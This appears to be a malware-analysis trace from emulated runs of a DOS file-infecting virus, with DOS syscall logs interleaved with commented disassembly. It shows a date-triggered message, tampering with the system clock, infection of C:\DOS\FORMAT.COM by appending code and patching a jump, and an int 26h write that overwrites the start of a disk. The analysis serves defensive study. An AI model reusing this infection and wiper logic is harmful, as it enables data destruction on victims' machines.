2018-12-25T11:46:33.455771901Z 42 PC: 12a8a | Get date 0x12a8a: cmp dh, 5
; Listing from the return address of the Get date call at 0x12a88 (DH=month, DL=day), in address order.
; The next trace row is Get disk transfer address, with no Display string row in this run.
0x12a8d: jge 0x12a92  ; month >= 5 -> check the day
0x12a8f: jmp 0x12ae0  ; otherwise skip the trigger
0x12a91: nop
0x12a92: cmp dl, 0xd  ; day >= 13 ?
0x12a95: jge 0x12ab8  ; yes -> 0x12ab8 (outside this excerpt)
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6  ; year == 1990 (0x7c6) ?
0x12a9e: je 0x12aad  ; yes: leave the clock alone
0x12aa0: mov ah, 0x2b  ; AH=2Bh: DOS Set date ...
0x12aa2: mov cx, 0x7c6  ; ... with the year forced to 1990
0x12aa5: int 0x21
0x12aa7: mov ah, 0x2d  ; AH=2Dh: DOS Set time ...
0x12aa9: mov cl, 1  ; ... with minutes = 1
0x12aab: int 0x21
0x12aad: mov ah, 0x2c  ; AH=2Ch: DOS Get time (CL = minutes)
0x12aaf: int 0x21
0x12ab1: cmp cl, 0xf  ; minutes >= 15 ?
0x12ab4: jae 0x12ac2  ; yes -> 0x12ac2 (outside this excerpt)
2018-12-25T11:46:33.457837259Z 47 PC: 12ae5 | Get disk transfer address
2018-12-25T11:46:33.458900946Z 26 PC: 12af8 | Set disk transfer address
2018-12-25T11:46:33.460527777Z 78 PC: 12b85 | Find first file
2018-12-25T11:46:33.471253Z 79 PC: 12b8b | Find next file
2018-12-25T11:46:33.473724601Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.47732239Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.480587611Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.483786788Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.495650518Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.498277041Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.500885471Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.504103579Z 78 PC: 12b85 | Find first file (See above)
2018-12-25T11:46:33.512605257Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.516757187Z 67 PC: 12bc4 | Get or set file attributes
2018-12-25T11:46:33.522881239Z 67 PC: 12bd6 | Get or set file attributes
2018-12-25T11:46:34.054715519Z 61 PC: 12be1 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:46:34.061891209Z 87 PC: 12bed | Get or set file date and time
2018-12-25T11:46:34.064756058Z 44 PC: 12bf9 | Get time 0x12bf9: mov ah, 0x3f
; Listing from the return address of the Get time call, in address order: start of the file-modification
; sequence. The rows after it show a 3-byte read, an 827-byte write and a 3-byte write on the handle
; opened for C:\DOS\FORMAT.COM.
0x12bfb: mov cx, 3  ; AH=3Fh read, CX = 3 bytes
0x12bfe: mov dx, 0x69
0x12c01: nop
0x12c02: add dx, si  ; DS:DX = si + 0x69: buffer for the file's first 3 bytes
0x12c04: int 0x21
0x12c06: jb 0x12c5e  ; CF set (error) -> 0x12c5e, the address the trace shows just after the 3-byte write
0x12c08: cmp ax, 3
0x12c0b: jne 0x12c5e  ; short read -> same exit
0x12c0d: mov ax, 0x4202  ; AH=42h, AL=2: seek relative to end of file
0x12c10: mov cx, 0
0x12c13: mov dx, 0  ; offset CX:DX = 0, so AX returns the file length (low word)
0x12c16: int 0x21
0x12c18: jb 0x12c5e
0x12c1a: mov cx, ax
0x12c1c: sub ax, 3
0x12c1f: mov word ptr [si + 0x6d], ax  ; stores length - 3; presumably the displacement for a 3-byte jump to the appended code (confirm)
0x12c22: nop
0x12c23: add cx, 0x352  ; cx = length + 0x352 (850)
0x12c27: mov di, si
2018-12-25T11:46:34.067156627Z 63 PC: 12c06 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:34.072876588Z 66 PC: 12c18 | Move file pointer
2018-12-25T11:46:34.075690063Z 64 PC: 12c3d | Write file or device (Write 827 bytes on handle 5)
2018-12-25T11:46:34.083357827Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:46:34.085007333Z 64 PC: 12c5e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:34.089154625Z 87 PC: 12c71 | Get or set file date and time
2018-12-25T11:46:34.090945647Z 62 PC: 12c75 | Close file
2018-12-25T11:46:34.097472226Z 67 PC: 12c84 | Get or set file attributes
2018-12-25T11:46:34.10815154Z 26 PC: 12c91 | Set disk transfer address

{"DateBased":true,"Day":13,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2816,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:33.716413176Z 255 PC: 12a6d | UNKNOWN!
2018-12-25T11:46:33.7172688Z 42 PC: 12a7a | Get date 0x12a7a: cmp cx, 0x7c9
; Listing starts at the return address of the Get date call and runs in address order,
; so both branch targets are shown, not only the path this run executed.
; int 21h/AH=2Ah returns CX=year, DH=month, DL=day; 0x7c9 = 1993.
; NOTE(review): the JSON row printed above this run gives Year 1980, Month 5, Day 13: jb -> 0x12a9a and
; the Set date path (those rows follow), then month >= 5 and day >= 13, which fits the Display string
; row later in this run. Confirm the JSON is this run's emulated clock.
0x12a7e: jb 0x12a9a  ; year < 1993 -> year-1990 handling at 0x12a9a
0x12a80: jge 0x12a85  ; otherwise re-read the date at 0x12a85
0x12a82: jmp 0x12ae0  ; fallback: skip the date logic
0x12a84: nop
0x12a85: mov ah, 0x2a  ; AH=2Ah: DOS Get date
0x12a87: nop
0x12a88: int 0x21
0x12a8a: cmp dh, 5  ; month >= 5 ?
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0  ; earlier month: no trigger
0x12a91: nop
0x12a92: cmp dl, 0xd  ; day >= 13 ?
0x12a95: jge 0x12ab8  ; yes -> 0x12ab8 (outside this excerpt)
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a9e: je 0x12aad  ; already 1990: skip the clock rewrite
0x12aa0: mov ah, 0x2b  ; AH=2Bh: DOS Set date
0x12aa2: mov cx, 0x7c6  ; new year = 1990; the excerpt ends before the int 0x21
2018-12-25T11:46:33.720263468Z 43 PC: 12aa7 | Set date
2018-12-25T11:46:33.724432644Z 45 PC: 12aad | Set time
2018-12-25T11:46:33.728366861Z 44 PC: 12ab1 | Get time 0x12ab1: cmp cl, 0xf
; Listing from the return address of the Get time call (CL = minutes), in address order.
; The next trace row is Get date at 12a8a, which indicates the jmp 0x12a85 path in this run.
; NOTE(review): this table contains no int 0x26 rows (it seems to log int 21h functions only),
; so the trace alone cannot show whether the disk write below ran after the Display string row
; that this run records at PC 12ac2.
0x12ab4: jae 0x12ac2  ; minutes >= 15 -> disk-write path at 0x12ac2
0x12ab6: jmp 0x12a85  ; otherwise loop back to the Get date at 0x12a85
0x12ab8: mov ah, 9  ; AH=09h: DOS Display string (target of the day >= 13 branch)
0x12aba: mov dx, si
0x12abc: add dx, 0x41  ; DS:DX = si + 0x41 (string address)
0x12abf: nop
0x12ac0: int 0x21  ; execution then falls through into 0x12ac2
0x12ac2: cmp byte ptr [si], 0x1a  ; presumably a drive number held at [si]; confirm
0x12ac5: nop
0x12ac6: nop
0x12ac7: ja 0x12ae0  ; above 0x1a: skip the disk write
0x12ac9: pushf
0x12aca: mov al, byte ptr [si]  ; AL = drive for int 26h
0x12acc: nop
0x12acd: nop
0x12ace: mov cx, 0x100  ; CX = 0x100 sectors
0x12ad1: mov dx, 0  ; DX = first logical sector 0
0x12ad4: mov bx, 1  ; DS:BX = source buffer
0x12ad7: int 0x26  ; DOS absolute disk write: destructive payload, overwrites the start of the volume
2018-12-25T11:46:33.73151146Z 42 PC: 12a8a | Get date 0x12a8a: cmp dh, 5
; Listing from the return address of the Get date call at 0x12a88 (DH=month, DL=day), in address order.
; The next trace row is Display string at PC 12ac2, i.e. the jge 0x12ab8 path was taken in this run.
0x12a8d: jge 0x12a92  ; month >= 5 -> check the day
0x12a8f: jmp 0x12ae0  ; otherwise skip the trigger
0x12a91: nop
0x12a92: cmp dl, 0xd  ; day >= 13 ?
0x12a95: jge 0x12ab8  ; yes -> 0x12ab8 (outside this excerpt)
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6  ; year == 1990 (0x7c6) ?
0x12a9e: je 0x12aad  ; yes: leave the clock alone
0x12aa0: mov ah, 0x2b  ; AH=2Bh: DOS Set date ...
0x12aa2: mov cx, 0x7c6  ; ... with the year forced to 1990
0x12aa5: int 0x21
0x12aa7: mov ah, 0x2d  ; AH=2Dh: DOS Set time ...
0x12aa9: mov cl, 1  ; ... with minutes = 1
0x12aab: int 0x21
0x12aad: mov ah, 0x2c  ; AH=2Ch: DOS Get time (CL = minutes)
0x12aaf: int 0x21
0x12ab1: cmp cl, 0xf  ; minutes >= 15 ?
0x12ab4: jae 0x12ac2  ; yes -> 0x12ac2 (outside this excerpt)
2018-12-25T11:46:33.734065367Z 9 PC: 12ac2 | Display string (String= ' Saigon will never fall!.. ')
2018-12-25T11:46:33.740991236Z 47 PC: 12ae5 | Get disk transfer address
2018-12-25T11:46:33.742763204Z 26 PC: 12af8 | Set disk transfer address
2018-12-25T11:46:33.74425274Z 78 PC: 12b85 | Find first file
2018-12-25T11:46:33.758260273Z 79 PC: 12b8b | Find next file
2018-12-25T11:46:33.761886878Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.764809509Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.767588577Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.770876192Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.773399808Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.775486175Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.777572854Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.781742527Z 78 PC: 12b85 | Find first file (See above)
2018-12-25T11:46:33.792254559Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.796340963Z 67 PC: 12bc4 | Get or set file attributes
2018-12-25T11:46:33.803916258Z 67 PC: 12bd6 | Get or set file attributes
2018-12-25T11:46:34.483983413Z 61 PC: 12be1 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:46:34.494088868Z 87 PC: 12bed | Get or set file date and time
2018-12-25T11:46:34.497232966Z 44 PC: 12bf9 | Get time 0x12bf9: mov ah, 0x3f
; Listing from the return address of the Get time call, in address order: start of the file-modification
; sequence. The rows after it show a 3-byte read, an 827-byte write and a 3-byte write on the handle
; opened for C:\DOS\FORMAT.COM.
0x12bfb: mov cx, 3  ; AH=3Fh read, CX = 3 bytes
0x12bfe: mov dx, 0x69
0x12c01: nop
0x12c02: add dx, si  ; DS:DX = si + 0x69: buffer for the file's first 3 bytes
0x12c04: int 0x21
0x12c06: jb 0x12c5e  ; CF set (error) -> 0x12c5e, the address the trace shows just after the 3-byte write
0x12c08: cmp ax, 3
0x12c0b: jne 0x12c5e  ; short read -> same exit
0x12c0d: mov ax, 0x4202  ; AH=42h, AL=2: seek relative to end of file
0x12c10: mov cx, 0
0x12c13: mov dx, 0  ; offset CX:DX = 0, so AX returns the file length (low word)
0x12c16: int 0x21
0x12c18: jb 0x12c5e
0x12c1a: mov cx, ax
0x12c1c: sub ax, 3
0x12c1f: mov word ptr [si + 0x6d], ax  ; stores length - 3; presumably the displacement for a 3-byte jump to the appended code (confirm)
0x12c22: nop
0x12c23: add cx, 0x352  ; cx = length + 0x352 (850)
0x12c27: mov di, si
2018-12-25T11:46:34.500768157Z 63 PC: 12c06 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:34.508062876Z 66 PC: 12c18 | Move file pointer
2018-12-25T11:46:34.51069453Z 64 PC: 12c3d | Write file or device (Write 827 bytes on handle 5)
2018-12-25T11:46:34.52074948Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:46:34.523381386Z 64 PC: 12c5e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:34.527975666Z 87 PC: 12c71 | Get or set file date and time
2018-12-25T11:46:34.529953794Z 62 PC: 12c75 | Close file
2018-12-25T11:46:34.537699751Z 67 PC: 12c84 | Get or set file attributes
2018-12-25T11:46:34.550670915Z 26 PC: 12c91 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2816,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:33.80975478Z 255 PC: 12a6d | UNKNOWN!
2018-12-25T11:46:33.811312477Z 42 PC: 12a7a | Get date 0x12a7a: cmp cx, 0x7c9
; Listing starts at the return address of the Get date call and runs in address order,
; so both branch targets are shown, not only the path this run executed.
; int 21h/AH=2Ah returns CX=year, DH=month, DL=day; 0x7c9 = 1993.
; NOTE(review): the JSON row printed above this run gives Year 1980, Month 1, Day 1: jb -> 0x12a9a and
; the Set date path (those rows follow), with the month below 5, so no Display string row is expected
; and none appears. Confirm the JSON is this run's emulated clock.
0x12a7e: jb 0x12a9a  ; year < 1993 -> year-1990 handling at 0x12a9a
0x12a80: jge 0x12a85  ; otherwise re-read the date at 0x12a85
0x12a82: jmp 0x12ae0  ; fallback: skip the date logic
0x12a84: nop
0x12a85: mov ah, 0x2a  ; AH=2Ah: DOS Get date
0x12a87: nop
0x12a88: int 0x21
0x12a8a: cmp dh, 5  ; month >= 5 ?
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0  ; earlier month: no trigger
0x12a91: nop
0x12a92: cmp dl, 0xd  ; day >= 13 ?
0x12a95: jge 0x12ab8  ; yes -> 0x12ab8 (outside this excerpt)
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a9e: je 0x12aad  ; already 1990: skip the clock rewrite
0x12aa0: mov ah, 0x2b  ; AH=2Bh: DOS Set date
0x12aa2: mov cx, 0x7c6  ; new year = 1990; the excerpt ends before the int 0x21
2018-12-25T11:46:33.82116508Z 43 PC: 12aa7 | Set date
2018-12-25T11:46:33.824731474Z 45 PC: 12aad | Set time
2018-12-25T11:46:33.828123192Z 44 PC: 12ab1 | Get time 0x12ab1: cmp cl, 0xf
; Listing from the return address of the Get time call (CL = minutes), in address order.
; The next trace row is Get date at 12a8a, which indicates the jmp 0x12a85 path in this run.
; NOTE(review): this table contains no int 0x26 rows (it seems to log int 21h functions only),
; so the trace alone cannot show whether the disk write below ever ran.
0x12ab4: jae 0x12ac2  ; minutes >= 15 -> disk-write path at 0x12ac2
0x12ab6: jmp 0x12a85  ; otherwise loop back to the Get date at 0x12a85
0x12ab8: mov ah, 9  ; AH=09h: DOS Display string (target of the day >= 13 branch)
0x12aba: mov dx, si
0x12abc: add dx, 0x41  ; DS:DX = si + 0x41 (string address)
0x12abf: nop
0x12ac0: int 0x21  ; execution then falls through into 0x12ac2
0x12ac2: cmp byte ptr [si], 0x1a  ; presumably a drive number held at [si]; confirm
0x12ac5: nop
0x12ac6: nop
0x12ac7: ja 0x12ae0  ; above 0x1a: skip the disk write
0x12ac9: pushf
0x12aca: mov al, byte ptr [si]  ; AL = drive for int 26h
0x12acc: nop
0x12acd: nop
0x12ace: mov cx, 0x100  ; CX = 0x100 sectors
0x12ad1: mov dx, 0  ; DX = first logical sector 0
0x12ad4: mov bx, 1  ; DS:BX = source buffer
0x12ad7: int 0x26  ; DOS absolute disk write: destructive payload, overwrites the start of the volume
2018-12-25T11:46:33.831398034Z 42 PC: 12a8a | Get date 0x12a8a: cmp dh, 5
; Listing from the return address of the Get date call at 0x12a88 (DH=month, DL=day), in address order.
; The next trace row is Get disk transfer address, with no Display string row in this run.
0x12a8d: jge 0x12a92  ; month >= 5 -> check the day
0x12a8f: jmp 0x12ae0  ; otherwise skip the trigger
0x12a91: nop
0x12a92: cmp dl, 0xd  ; day >= 13 ?
0x12a95: jge 0x12ab8  ; yes -> 0x12ab8 (outside this excerpt)
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6  ; year == 1990 (0x7c6) ?
0x12a9e: je 0x12aad  ; yes: leave the clock alone
0x12aa0: mov ah, 0x2b  ; AH=2Bh: DOS Set date ...
0x12aa2: mov cx, 0x7c6  ; ... with the year forced to 1990
0x12aa5: int 0x21
0x12aa7: mov ah, 0x2d  ; AH=2Dh: DOS Set time ...
0x12aa9: mov cl, 1  ; ... with minutes = 1
0x12aab: int 0x21
0x12aad: mov ah, 0x2c  ; AH=2Ch: DOS Get time (CL = minutes)
0x12aaf: int 0x21
0x12ab1: cmp cl, 0xf  ; minutes >= 15 ?
0x12ab4: jae 0x12ac2  ; yes -> 0x12ac2 (outside this excerpt)
2018-12-25T11:46:33.833952801Z 47 PC: 12ae5 | Get disk transfer address
2018-12-25T11:46:33.836791903Z 26 PC: 12af8 | Set disk transfer address
2018-12-25T11:46:33.838837975Z 78 PC: 12b85 | Find first file
2018-12-25T11:46:33.850962143Z 79 PC: 12b8b | Find next file
2018-12-25T11:46:33.853717789Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.857028252Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.859701497Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.862301589Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.865220171Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.867825675Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.870300191Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.873215471Z 78 PC: 12b85 | Find first file (See above)
2018-12-25T11:46:33.878866471Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.882203942Z 67 PC: 12bc4 | Get or set file attributes
2018-12-25T11:46:33.88914963Z 67 PC: 12bd6 | Get or set file attributes
2018-12-25T11:46:34.483365866Z 61 PC: 12be1 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:46:34.490926649Z 87 PC: 12bed | Get or set file date and time
2018-12-25T11:46:34.492549058Z 44 PC: 12bf9 | Get time 0x12bf9: mov ah, 0x3f
; Listing from the return address of the Get time call, in address order: start of the file-modification
; sequence. The rows after it show a 3-byte read, an 827-byte write and a 3-byte write on the handle
; opened for C:\DOS\FORMAT.COM.
0x12bfb: mov cx, 3  ; AH=3Fh read, CX = 3 bytes
0x12bfe: mov dx, 0x69
0x12c01: nop
0x12c02: add dx, si  ; DS:DX = si + 0x69: buffer for the file's first 3 bytes
0x12c04: int 0x21
0x12c06: jb 0x12c5e  ; CF set (error) -> 0x12c5e, the address the trace shows just after the 3-byte write
0x12c08: cmp ax, 3
0x12c0b: jne 0x12c5e  ; short read -> same exit
0x12c0d: mov ax, 0x4202  ; AH=42h, AL=2: seek relative to end of file
0x12c10: mov cx, 0
0x12c13: mov dx, 0  ; offset CX:DX = 0, so AX returns the file length (low word)
0x12c16: int 0x21
0x12c18: jb 0x12c5e
0x12c1a: mov cx, ax
0x12c1c: sub ax, 3
0x12c1f: mov word ptr [si + 0x6d], ax  ; stores length - 3; presumably the displacement for a 3-byte jump to the appended code (confirm)
0x12c22: nop
0x12c23: add cx, 0x352  ; cx = length + 0x352 (850)
0x12c27: mov di, si
2018-12-25T11:46:34.496441855Z 63 PC: 12c06 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:34.502243883Z 66 PC: 12c18 | Move file pointer
2018-12-25T11:46:34.503605452Z 64 PC: 12c3d | Write file or device (Write 827 bytes on handle 5)
2018-12-25T11:46:34.511911319Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:46:34.513260876Z 64 PC: 12c5e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:34.516142927Z 87 PC: 12c71 | Get or set file date and time
2018-12-25T11:46:34.518256021Z 62 PC: 12c75 | Close file
2018-12-25T11:46:34.525142802Z 67 PC: 12c84 | Get or set file attributes
2018-12-25T11:46:34.535712876Z 26 PC: 12c91 | Set disk transfer address